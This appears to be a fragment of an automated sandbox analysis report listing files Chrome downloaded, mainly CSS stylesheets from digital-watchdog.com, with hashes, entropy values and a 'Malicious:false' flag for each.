                                                                                                                                                                                    Preview:...........\.r.8.}.W.-3.0.@..yY..O2..K.U..).%.8..kk.}...bg.O..-.....P @.....).={2z6z.u..z}.:>:.X.....r<.^./.G..y.XuG.T....|..+...=....[L......E{...d4"4..n.GOOL..7.b.....j}3........M...H2..V...h....&W.v==7w...[A.G.8...o....W..zs..?...._.We.._&.e......o.N..w....?.^/~..3y.......=.R?o..=5...xG...|....v1..?...Y...I."....`....T..u.....'.F.....?$....`....ah,R. M,..B7.xU3:.:&..)....NGE...5]..".Y.*....,n.J....E..&z.-..x.hg.Y....-&*C .u.AQ.(.......y".f..y. ..m.9Wx.J..3.&..X.D..8.2Ew",{...P(......D.M..J...0@7..........k`8/.L.....~).....S..]w..`..!9....d....F.;FOZ|.....Ge.....RBQX. .....}...Q.'..UPS.....%P =qai.s|.k..8R..R.fM..b.:..X:X...k.X7...[.....k\...9S@...Z.8.K.-...E|...5C.X.-.......C[........MK@.\.0....j..*....8.9..]..X....X...|.s.....b.j.F..P(L(......".e..o.'!1...2...SY...T|..Iw.w....z.T.r...........l[..t).....> &....<.).e..x...k...i.v..e;D.M..pS.....7.7......IZ.E..~..!..I.....MK. .......]2....+m...4....b.s: n..p{g./...:..M<.p
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1374
                                                                                                                                                                                    Entropy (8bit):4.808843288676536
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:9F87D65D73804BDBFC0263064014231E
                                                                                                                                                                                    SHA1:E3E21C977DEC4B88708C8367B598EA4EF62ABF84
                                                                                                                                                                                    SHA-256:C84D9797FA35C07C0405C159F612B4041F0E34672B0E0F4F6F4809868295D2F8
                                                                                                                                                                                    SHA-512:C6B9BBD37A7D4D9A547CF6FD3705057FD293DE1E5E0DF0080739F606AD3F69DC1AD9DC7E772BCD38AFA40912C4AA346C805D2A5EB7935A406A9786B9A5D901A8
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://digital-watchdog.com/library/select2/css/select2pp.css
                                                                                                                                                                                    Preview:.select2-container {.. margin-bottom: 30px!important;..}.....select2-container--default .select2-search--dropdown .select2-search__field {.. height: 50px;..}.....select2-container--default .select2-results__group {.. color: #000 !important;.. font-size: 18px;.. font-weight: 500;..}.....select2-container--default .select2-selection--single .select2-selection__rendered {.. background: #ffffff none repeat scroll 0 0;.. border: none;.. color: #000000;.. line-height: 60px!important;.. padding-left: 0px!important;.. border-bottom: solid 1px #dee2e6;.. background-image: url(../../../i/fa-angle-down-dark.png);.. background-repeat: no-repeat;.. background-position: 90% 50%;.. background-position: calc(100% - 20px) 50%;.. background-size: 11px 6px;..}.....select2-container--default .select2-selection--single .select2-selection__arrow {.. display: none;..}.....select2-container--default .select2-selection--single {.. background-color: #ffffff;
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):14266
                                                                                                                                                                                    Entropy (8bit):5.162169539571026
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:78761D9BD0F1FF4C49AEF7B0686B3432
                                                                                                                                                                                    SHA1:CEF1E1743AB59606CD3EE87B5BA168D21C338511
                                                                                                                                                                                    SHA-256:38BED1357A79A40A8A425E9D8788FDB09A1AEBBCAF3D44FD292F1CB1F78909D4
                                                                                                                                                                                    SHA-512:60D397E8A295695EBD99D3D39DBCC191FD5093735B5EB482E17299350E524CF9245458141AB7FA69CF6B92FCD6C55EED851A0D634A275332116CCFB5FEDE598D
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://digital-watchdog.com/css/custom-style.css?20250530073516
                                                                                                                                                                                    Preview:../* BLOCK: Banner 01 */...banner-01{display:block; position:relative; width:100%;}...banner-01 .slide-container{display:block; position:relative; width:100%;}...banner-01 .slide{...display:flex; position:relative; width:100%; height:55vw; max-height: 650px; overflow:hidden; outline:none;...align-items:center;..}...banner-01 .slide > .bg-img{...position:absolute; top:0; bottom:0; left:0; right:0; background-size:cover;...background-position:center;..}...banner-01 .slide > a.click-area{...outline:none; display:block; position:absolute; top:0; bottom:0; left:0; right:0; z-index:2;..}...banner-01 .slide .text-container{display:flex; justify-content:flex-end;}...banner-01 .slide .animate{opacity:0; transform:translateY(-2rem); transition:all .75s;}...banner-01 .slide.slick-active .animate{opacity:1; transform:translateY(0); transition-delay:var(--delay);}...banner-01 .dots{.. position:absolute; bottom:0; left:0; right:0; height:2.5rem; display:flex; align-items:center;.. justify-cont
                                                                                                                                                                                    No static file info